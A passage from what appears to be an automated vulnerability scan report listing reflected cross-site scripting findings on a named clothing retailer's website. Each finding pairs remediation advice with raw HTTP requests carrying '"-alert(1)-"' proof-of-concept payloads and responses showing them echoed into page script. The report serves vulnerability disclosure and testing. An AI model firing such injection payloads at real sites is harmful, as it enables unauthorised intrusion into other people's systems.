Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition70f33"-alert(1)-"55941b02465/men/liberty-blank-canvas/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bak51qld4c0iqbgdtpogctnhl1; expires=Tue, 09-Nov-2010 17:09:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition70f33"-alert(1)-"55941b02465/men/liberty-blank-canvas/");
//]]>
...[SNIP]...

1.120. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443a9"-alert(1)-"e720bf77e2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men443a9"-alert(1)-"e720bf77e2a/liberty-blank-canvas/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=h813f9bc0t7s20s9plqkq52q26; expires=Tue, 09-Nov-2010 17:10:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men443a9"-alert(1)-"e720bf77e2a/liberty-blank-canvas/");
//]]>
...[SNIP]...

1.121. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55b43"-alert(1)-"a143e97bf8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/liberty-blank-canvas55b43"-alert(1)-"a143e97bf8f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tr5obeucie5eqkimd9lql3i1v1; expires=Tue, 09-Nov-2010 17:10:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/liberty-blank-canvas55b43"-alert(1)-"a143e97bf8f/");
//]]>
...[SNIP]...

1.122. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec45f"-alert(1)-"932cb284aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/liberty-blank-canvas/?ec45f"-alert(1)-"932cb284aae=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=n2lvemetp3uf61ntmcfdl2ese7; expires=Tue, 09-Nov-2010 17:09:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Liberty
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/liberty-blank-canvas/?ec45f"-alert(1)-"932cb284aae=1");
//]]>
...[SNIP]...

1.123. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aafcd"-alert(1)-"ca9f7a6b3df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionaafcd"-alert(1)-"ca9f7a6b3df/men/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=02flunniengit26kuohu44o1c7; expires=Tue, 09-Nov-2010 17:10:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionaafcd"-alert(1)-"ca9f7a6b3df/men/new-styles/");
//]]>
...[SNIP]...

1.124. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c508"-alert(1)-"48cebfcb06f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men1c508"-alert(1)-"48cebfcb06f/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=k1u51f38e8cm2j4krda42f2rm4; expires=Tue, 09-Nov-2010 17:10:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men1c508"-alert(1)-"48cebfcb06f/new-styles/");
//]]>
...[SNIP]...

1.125. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac829"-alert(1)-"50d8a14032a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/new-stylesac829"-alert(1)-"50d8a14032a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=59kn1i9dtbvkogr6rl1mvbt6b7; expires=Tue, 09-Nov-2010 17:11:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/new-stylesac829"-alert(1)-"50d8a14032a/");
//]]>
...[SNIP]...

1.126. http://www.fredperry.com/limited-edition/men/new-styles/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e7e"-alert(1)-"8e25b5ff5f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/new-styles/?76e7e"-alert(1)-"8e25b5ff5f5=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uii8f2bu4sdjkl14jhgqenv304; expires=Tue, 09-Nov-2010 17:09:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> New Sty
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/new-styles/?76e7e"-alert(1)-"8e25b5ff5f5=1");
//]]>
...[SNIP]...

1.127. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3bbe"-alert(1)-"0ef1f74b959 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionc3bbe"-alert(1)-"0ef1f74b959/men/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ahcu0t9dl58c4ic4fiimqkn4j4; expires=Tue, 09-Nov-2010 17:13:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionc3bbe"-alert(1)-"0ef1f74b959/men/shirts/");
//]]>
...[SNIP]...

1.128. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b708"-alert(1)-"86e896e7b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men3b708"-alert(1)-"86e896e7b1/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hajrgog5oo0eacbkbp05vslkm4; expires=Tue, 09-Nov-2010 17:13:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men3b708"-alert(1)-"86e896e7b1/shirts/");
//]]>
...[SNIP]...

1.129. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66c85"-alert(1)-"c119ad27ab7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shirts66c85"-alert(1)-"c119ad27ab7/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oba1oi45aktor2om73s3ubdli3; expires=Tue, 09-Nov-2010 17:14:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shirts66c85"-alert(1)-"c119ad27ab7/");
//]]>
...[SNIP]...

1.130. http://www.fredperry.com/limited-edition/men/shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d34bf"-alert(1)-"05db03a5909 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shirts/?d34bf"-alert(1)-"05db03a5909=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3spam892hoo88moq3da5fa1633; expires=Tue, 09-Nov-2010 17:11:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shirts/?d34bf"-alert(1)-"05db03a5909=1");
//]]>
...[SNIP]...

1.131. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 163c5"-alert(1)-"603148a5fb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition163c5"-alert(1)-"603148a5fb5/men/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ucne4doaae3jrhji44hi543ii4; expires=Tue, 09-Nov-2010 17:12:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition163c5"-alert(1)-"603148a5fb5/men/shorts/");
//]]>
...[SNIP]...

1.132. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd734"-alert(1)-"5870bc30553 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/mencd734"-alert(1)-"5870bc30553/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:11 GMT
